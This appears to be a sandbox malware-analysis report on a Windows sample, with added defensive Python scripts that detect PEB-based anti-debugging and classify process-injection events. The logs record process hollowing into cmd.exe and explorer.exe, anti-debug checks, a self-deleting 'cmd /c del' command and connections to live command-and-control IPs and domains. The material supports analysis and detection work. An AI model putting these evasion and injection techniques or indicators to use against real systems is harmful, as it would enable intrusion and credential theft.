      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E79D mov eax, dword ptr fs:[00000030h]15_2_03B5E79D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E79D mov eax, dword ptr fs:[00000030h]15_2_03B5E79D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E79D mov eax, dword ptr fs:[00000030h]15_2_03B5E79D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E79D mov eax, dword ptr fs:[00000030h]15_2_03B5E79D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E79D mov eax, dword ptr fs:[00000030h]15_2_03B5E79D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E79D mov eax, dword ptr fs:[00000030h]15_2_03B5E79D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E79D mov eax, dword ptr fs:[00000030h]15_2_03B5E79D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BBB781 mov eax, dword ptr fs:[00000030h]15_2_03BBB781
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BBB781 mov eax, dword ptr fs:[00000030h]15_2_03BBB781
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE37E4 mov eax, dword ptr fs:[00000030h]15_2_03AE37E4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE37E4 mov eax, dword ptr fs:[00000030h]15_2_03AE37E4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE37E4 mov eax, dword ptr fs:[00000030h]15_2_03AE37E4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE37E4 mov eax, dword ptr fs:[00000030h]15_2_03AE37E4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE37E4 mov eax, dword ptr fs:[00000030h]15_2_03AE37E4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE37E4 mov eax, dword ptr fs:[00000030h]15_2_03AE37E4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE37E4 mov eax, dword ptr fs:[00000030h]15_2_03AE37E4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0E7E0 mov eax, dword ptr fs:[00000030h]15_2_03B0E7E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE77F9 mov eax, dword ptr fs:[00000030h]15_2_03AE77F9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE77F9 mov eax, dword ptr fs:[00000030h]15_2_03AE77F9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B9F7CF mov eax, dword ptr fs:[00000030h]15_2_03B9F7CF
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B09723 mov eax, dword ptr fs:[00000030h]15_2_03B09723
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADB705 mov eax, dword ptr fs:[00000030h]15_2_03ADB705
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADB705 mov eax, dword ptr fs:[00000030h]15_2_03ADB705
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADB705 mov eax, dword ptr fs:[00000030h]15_2_03ADB705
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADB705 mov eax, dword ptr fs:[00000030h]15_2_03ADB705
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AED700 mov ecx, dword ptr fs:[00000030h]15_2_03AED700
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B9F717 mov eax, dword ptr fs:[00000030h]15_2_03B9F717
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA970B mov eax, dword ptr fs:[00000030h]15_2_03BA970B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA970B mov eax, dword ptr fs:[00000030h]15_2_03BA970B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE471B mov eax, dword ptr fs:[00000030h]15_2_03AE471B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE471B mov eax, dword ptr fs:[00000030h]15_2_03AE471B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0270D mov eax, dword ptr fs:[00000030h]15_2_03B0270D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0270D mov eax, dword ptr fs:[00000030h]15_2_03B0270D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0270D mov eax, dword ptr fs:[00000030h]15_2_03B0270D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B10774 mov eax, dword ptr fs:[00000030h]15_2_03B10774
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF2760 mov ecx, dword ptr fs:[00000030h]15_2_03AF2760
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B21763: mov eax, dword ptr fs:[00000030h] (6 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03AE4779: mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B1A750: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B02755: mov eax, dword ptr fs:[00000030h] (5 hits); mov ecx, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B8E750: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B13740: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03ADF75B: mov eax, dword ptr fs:[00000030h] (9 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B1174A: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03BA86A8: mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B6C691: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03AF0680: mov eax, dword ptr fs:[00000030h] (12 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B9F68C: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03AE8690: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B5C6F2: mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03AD96E0: mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03AEC6E0: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03AE56E0: mov eax, dword ptr fs:[00000030h] (3 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B066E0: mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B0D6D0: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03AE06CF: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03BAA6C0: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B886C2: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B10630: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B68633: mov esi, dword ptr fs:[00000030h] (1 hit); mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03AE5622: mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03AE7623: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B1F63F: mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B1C620: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B8D62C: mov ecx, dword ptr fs:[00000030h] (2 hits); mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03AE0630: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B0D600: mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03BB4600: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B9F607: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B1360F: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B73608: mov eax, dword ptr fs:[00000030h] (6 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B22670: mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03AD7662: mov eax, dword ptr fs:[00000030h] (3 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B1666D: mov esi, dword ptr fs:[00000030h] (1 hit); mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03AE0670: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B15654: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03ADD64A: mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B1265C: mov eax, dword ptr fs:[00000030h] (2 hits); mov ecx, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03AE3640: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03AFF640: mov eax, dword ptr fs:[00000030h] (3 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B1C640: mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03AE965A: mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B685AA: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03AE45B0: mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B6C592: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B12594: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B1A580: mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B19580: mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B9F582: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B5E588: mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B6C5FC: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03AEB5E0: mov eax, dword ptr fs:[00000030h] (6 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B1A5E7: mov ebx, dword ptr fs:[00000030h] (1 hit); mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B115EF: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B165D0: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03ADF5C7: mov eax, dword ptr fs:[00000030h] (9 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B605C6: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B1C5C6: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03AF252B: mov eax, dword ptr fs:[00000030h] (7 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B22539: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03AD753F: mov eax, dword ptr fs:[00000030h] (3 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B1F523: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B11527: mov eax, dword ptr fs:[00000030h] (1 hit)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03AE3536: mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B8F51B: mov eax, dword ptr fs:[00000030h] (11 hits); mov ecx, dword ptr fs:[00000030h] (2 hits)
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_03B01514: mov eax, dword ptr fs:[00000030h] (6 hits)
Source: C:\Windows\SysWOW64\cmd.exe, process queried: DebugPort
Source: C:\Users\user\Desktop\jU0hAXFL0k.exe, code function 5_2_00401759: lstrcatA, CompareFileTime, LdrInitializeThunk, LdrInitializeThunk, SetFileTime, CloseHandle, lstrcatA
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_00D76EC0: SetUnhandledExceptionFilter
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_00D76B40: SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
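The long run of `mov eax, dword ptr fs:[00000030h]` hits above is the report's evidence that the code injected into cmd.exe reads the 32-bit PEB directly, which is how unpacked loaders reach BeingDebugged, NtGlobalFlag and the loader data (Ldr) without calling an API that a hook could see. The scanner below is an added example, not code from the report or from Joe Sandbox: it finds the canonical encodings of `mov r32, fs:[30h]` in a raw 32-bit code buffer and names the PEB field that the next instruction dereferences. The sample bytes are constructed; the field offsets (0x02, 0x0C, 0x68) are the documented 32-bit PEB layout, and assuming the very next instruction is the field access is a simplification (a real prologue may put junk in between, and the report's matches may use encodings this scanner does not cover).

```python
"""Find 32-bit PEB reads (mov r32, fs:[30h]) in raw code and name the PEB
field the following instruction touches.

Added example, not code from the Joe Sandbox report. The SAMPLE bytes at
the bottom are constructed for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Two encodings of `mov r32, fs:[00000030h]`:
#   64 A1 30 00 00 00        mov eax, fs:[30h]   (moffs32 short form)
#   64 8B /r 30 00 00 00     mov r32, fs:[30h]   ModRM = 0x05 | (reg << 3)
PEB_READ = re.compile(
    rb"\x64(?:\xA1\x30\x00\x00\x00"
    rb"|\x8B([\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00)"
)

# Documented 32-bit PEB offsets that anti-debug and manual-loading code reads.
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x68: "NtGlobalFlag"}


@dataclass(frozen=True)
class PebRead:
    offset: int            # offset of the 0x64 (fs:) prefix in the buffer
    register: str          # register that receives the PEB pointer
    field: str | None      # PEB field dereferenced next, if recognised


def _disp8(code: bytes, pos: int, rm: int, digit: int | None = None) -> int | None:
    """Return disp8 if code[pos] is a ModRM byte of the form [rm + disp8]
    (mod = 01), optionally requiring a given /digit in the reg field."""
    if pos + 1 >= len(code) or rm == 4:        # rm = 100 needs a SIB byte; skip
        return None
    modrm = code[pos]
    if (modrm >> 6) != 0b01 or (modrm & 7) != rm:
        return None
    if digit is not None and ((modrm >> 3) & 7) != digit:
        return None
    return code[pos + 1]


def classify_followup(code: bytes, pos: int, reg: int) -> str | None:
    """Name the PEB field if the instruction at `pos` is a memory access
    relative to `reg`, for these common forms:
        0F B6 /r disp8        movzx r32, byte ptr [reg+disp8]
        80 /7 disp8 imm8      cmp   byte ptr [reg+disp8], imm8
        8B /r disp8           mov   r32, [reg+disp8]
        F7 /0 disp8 imm32     test  dword ptr [reg+disp8], imm32
    """
    head = code[pos:pos + 2]
    if head == b"\x0F\xB6":
        disp = _disp8(code, pos + 2, reg)
    elif head[:1] == b"\x80":
        disp = _disp8(code, pos + 1, reg, digit=7)
    elif head[:1] == b"\x8B":
        disp = _disp8(code, pos + 1, reg)
    elif head[:1] == b"\xF7":
        disp = _disp8(code, pos + 1, reg, digit=0)
    else:
        return None
    if disp is None:
        return None
    return PEB_FIELDS.get(disp, f"PEB+0x{disp:02X}")


def scan(code: bytes) -> list[PebRead]:
    """Return every PEB read in `code`, with the field it is used for."""
    hits: list[PebRead] = []
    for m in PEB_READ.finditer(code):
        modrm = m.group(1)
        reg = 0 if modrm is None else (modrm[0] >> 3) & 7
        hits.append(PebRead(m.start(), REG32[reg], classify_followup(code, m.end(), reg)))
    return hits


# Constructed sample: four PEB reads as a packer prologue might contain them.
SAMPLE = (
    b"\x64\xA1\x30\x00\x00\x00"          # mov   eax, fs:[30h]
    b"\x0F\xB6\x40\x02"                  # movzx eax, byte ptr [eax+2]      BeingDebugged
    b"\x90\x90"
    b"\x64\x8B\x0D\x30\x00\x00\x00"      # mov   ecx, fs:[30h]
    b"\xF7\x41\x68\x70\x00\x00\x00"      # test  dword ptr [ecx+68h], 70h   NtGlobalFlag heap flags
    b"\x90"
    b"\x64\x8B\x35\x30\x00\x00\x00"      # mov   esi, fs:[30h]
    b"\x8B\x76\x0C"                      # mov   esi, [esi+0Ch]             Ldr
    b"\x64\x8B\x1D\x30\x00\x00\x00"      # mov   ebx, fs:[30h]
    b"\xC3"                              # ret                              no field access
)

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(f"{hit.offset:#06x}  mov {hit.register}, fs:[30h]  ->  {hit.field}")
```

Run over a dumped memory region (for example the 0x030D0000 region the Yara rules matched) the output gives a per-function picture of which PEB fields the loader consults, which is what the report's one-line-per-hit listing above compresses into counts.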

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe, network connect: 103.224.212.210:80
Source: C:\Windows\explorer.exe, network connect: 172.67.193.177:80
Source: C:\Windows\explorer.exe, network connect: 23.227.38.74:80
Source: C:\Windows\explorer.exe, network connect: 208.91.197.27:80
Source: C:\Windows\explorer.exe, network connect: 66.96.162.133:80
Source: C:\Windows\explorer.exe, network connect: 104.21.19.227:80
Source: C:\Windows\explorer.exe, network connect: 172.67.210.176:80
Source: C:\Windows\explorer.exe, network connect: 104.247.82.51:80
Source: C:\Windows\explorer.exe, network connect: 172.67.148.68:80
Source: C:\Windows\explorer.exe, network connect: 3.33.130.190:80
Source: C:\Windows\explorer.exe, network connect: 104.247.82.90:80
Source: C:\Users\user\Desktop\jU0hAXFL0k.exe, section unmapped: C:\Windows\SysWOW64\cmd.exe, base address: D60000
Source: C:\Users\user\Desktop\jU0hAXFL0k.exe, section loaded: unknown, target: C:\Windows\explorer.exe, protection: execute and read and write
Source: C:\Users\user\Desktop\jU0hAXFL0k.exe, section loaded: unknown, target: C:\Windows\SysWOW64\cmd.exe, protection: execute and read and write
Source: C:\Users\user\Desktop\jU0hAXFL0k.exe, section loaded: unknown, target: C:\Windows\SysWOW64\cmd.exe, protection: execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe, section loaded: unknown, target: C:\Windows\explorer.exe, protection: read write
Source: C:\Windows\SysWOW64\cmd.exe, section loaded: unknown, target: C:\Windows\explorer.exe, protection: execute and read and write
Source: C:\Users\user\Desktop\jU0hAXFL0k.exe, thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\jU0hAXFL0k.exe, thread register set: target process: 4928
Source: C:\Windows\SysWOW64\cmd.exe, thread register set: target process: 4928
Source: C:\Users\user\Desktop\jU0hAXFL0k.exe, process created: C:\Users\user\Desktop\jU0hAXFL0k.exe C:\Users\user\Desktop\jU0hAXFL0k.exe
Source: C:\Windows\SysWOW64\cmd.exe, process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\jU0hAXFL0k.exe"
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_00D66854: GetSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, FileTimeToSystemTime, GetLocaleInfoW, GetDateFormatW, memmove, GetDateFormatW, realloc, GetDateFormatW, memmove, GetLastError, GetLastError, realloc
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_00D68572: GetLocaleInfoW (14 calls), setlocale
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_00D69310: GetSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, FileTimeToSystemTime, GetLocaleInfoW, memmove, GetTimeFormatW
Source: C:\Windows\SysWOW64\cmd.exe, code function 15_2_00D848D7: GetSystemTime, SystemTimeToFileTime
Source: C:\Users\user\Desktop\jU0hAXFL0k.exe, code function 5_2_00403235: EntryPoint, SetErrorMode, GetVersion, lstrlenA, LdrInitializeThunk, #17, OleInitialize, LdrInitializeThunk, SHGetFileInfoA, GetCommandLineA, CharNextA, LdrInitializeThunk, GetTempPathA, GetTempPathA, GetWindowsDirectoryA, lstrcatA, GetTempPathA, lstrcatA, SetEnvironmentVariableA, SetEnvironmentVariableA, SetEnvironmentVariableA, DeleteFileA, OleUninitialize, ExitProcess, lstrcatA, lstrcatA, lstrcatA, lstrcmpiA, SetCurrentDirectoryA, DeleteFileA, LdrInitializeThunk, CopyFileA, CloseHandle, LdrInitializeThunk, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, LdrInitializeThunk, ExitWindowsEx, ExitProcess
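The section and thread events above are the raw material behind the report's "Sample uses process hollowing technique", "Maps a DLL or memory area into another process", "Queues an APC in another process" and "Modifies the context of a thread in another process" signatures, but listed flat they hide which primitive was used against which target. The correlator below is an added example, not part of the report: it parses those lines (copied from the report with the column separators restored) and groups them per source/target pair so the injection chain per target becomes visible. The report names the target of the two "Thread register set" events only by PID 4928, so the correlator keeps that PID as its own key instead of assuming it is explorer.exe; the verdict labels are this example's own wording, not the report's.

```python
"""Correlate a sandbox report's section/thread events per (source, target)
pair and name the injection primitive they add up to.

Added example, not code from the Joe Sandbox report. EVENTS are copied from
the report's HIPS / PFW section with the column separators restored; the
verdict labels are this example's own.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

LINE = re.compile(
    r"^Source: (?P<source>.+?) \| (?P<kind>Section unmapped|Section loaded|"
    r"Thread APC queued|Thread register set): (?P<detail>.+)$"
)


@dataclass(frozen=True)
class Event:
    source: str
    target: str             # image path, or a bare PID where the report gives only that
    kind: str               # unmap | map | apc | setctx
    protection: str | None  # only for map events


def parse(line: str) -> Event | None:
    """Turn one report line into an Event; lines of other kinds yield None."""
    m = LINE.match(line)
    if not m:
        return None
    source, kind, detail = m.group("source", "kind", "detail")
    if kind == "Section unmapped":
        return Event(source, detail.split(" base address:")[0].strip(), "unmap", None)
    if kind == "Section loaded":
        t = re.search(r"target: (?P<t>.+?) protection: (?P<p>.+)$", detail)
        return Event(source, t["t"], "map", t["p"]) if t else None
    target = detail.split("target process:")[1].strip()
    return Event(source, target, "apc" if kind == "Thread APC queued" else "setctx", None)


def classify(events: list[Event]) -> dict[tuple[str, str], str]:
    """Group events per (source, target) and label the injection primitive."""
    by_pair: dict[tuple[str, str], list[Event]] = defaultdict(list)
    for e in events:
        by_pair[(e.source, e.target)].append(e)
    verdicts: dict[tuple[str, str], str] = {}
    for pair, evs in by_pair.items():
        kinds = {e.kind for e in evs}
        # an executable mapping is the payload delivery; the rest is the trigger
        rwx = any(e.kind == "map" and "execute" in (e.protection or "") for e in evs)
        if "unmap" in kinds and rwx:
            verdict = "process hollowing (image unmapped, RWX section mapped)"
        elif rwx and "apc" in kinds:
            verdict = "APC injection (RWX section mapped, APC queued)"
        elif rwx and "setctx" in kinds:
            verdict = "thread hijacking (RWX section mapped, thread context set)"
        elif rwx:
            verdict = "RWX section mapped into target (no execution primitive seen)"
        elif "setctx" in kinds:
            verdict = "thread context set (no section mapping seen for this target key)"
        else:
            verdict = "unclassified"
        verdicts[pair] = verdict
    return verdicts


def analyse(lines: list[str]) -> dict[tuple[str, str], str]:
    return classify([e for e in map(parse, lines) if e is not None])


# Copied from the report's HIPS / PFW section, separators restored.
EVENTS = [
    r"Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: D60000",
    r"Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write",
    r"Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write",
    r"Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write",
    r"Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write",
    r"Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write",
    r"Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Thread APC queued: target process: C:\Windows\explorer.exe",
    r"Source: C:\Users\user\Desktop\jU0hAXFL0k.exe | Thread register set: target process: 4928",
    r"Source: C:\Windows\SysWOW64\cmd.exe | Thread register set: target process: 4928",
]

if __name__ == "__main__":
    for (src, dst), verdict in analyse(EVENTS).items():
        print(f"{src} -> {dst}: {verdict}")
```

Joining the PID-keyed entries to an image name needs the report's process list (not reproduced here); once that mapping is available the two "thread context set" verdicts collapse into whichever of the other keys PID 4928 belongs to.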

Stealing of Sensitive Information

Source: Yara match, file source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match, file source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix: techniques with matching signatures, per tactic (the number in parentheses is the signature badge exactly as shown in the report's matrix cell):

Initial Access: Valid Accounts (1)
Execution: Native API (1); Shared Modules (1)
Persistence: DLL Side-Loading (1); Valid Accounts (1); Registry Run Keys / Startup Folder (1)
Privilege Escalation: DLL Side-Loading (1); Valid Accounts (1); Access Token Manipulation (11); Process Injection (511); Registry Run Keys / Startup Folder (1)
Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Rootkit (1); Masquerading (1); Valid Accounts (1); Virtualization/Sandbox Evasion (2); Access Token Manipulation (11); Process Injection (511)
Credential Access: Credential API Hooking (1)
Discovery: System Time Discovery (1); File and Directory Discovery (3); System Information Discovery (14); Security Software Discovery (4); Virtualization/Sandbox Evasion (2); Process Discovery (1); Application Window Discovery (1)
Collection: Archive Collected Data (1); Credential API Hooking (1); Clipboard Data (1)
Command and Control: Ingress Tool Transfer (3); Encrypted Channel (1); Non-Application Layer Protocol (3); Application Layer Protocol (113)
Impact: System Shutdown/Reboot (1)
Lateral Movement, Exfiltration, Network Effects, Remote Service Effects: no matching signatures

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
Behavior Graph ID: 1326341 | Sample: jU0hAXFL0k.exe | Start date: 16/10/2023 | Architecture: WINDOWS | Score: 100

Graph-level nodes:
Domains / IPs: www.wgardsgm.live; www.thesoftwarepractitioner.com; 18 other IPs or domains
Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Found malware configuration; 8 other signatures

Process tree as drawn in the graph (the numbers in parentheses are the graph's per-process counters, see the legend above):
jU0hAXFL0k.exe (2, 35), started
  dropped: C:\Users\user\AppData\Local\...\System.dll, PE32
  jU0hAXFL0k.exe (6), started
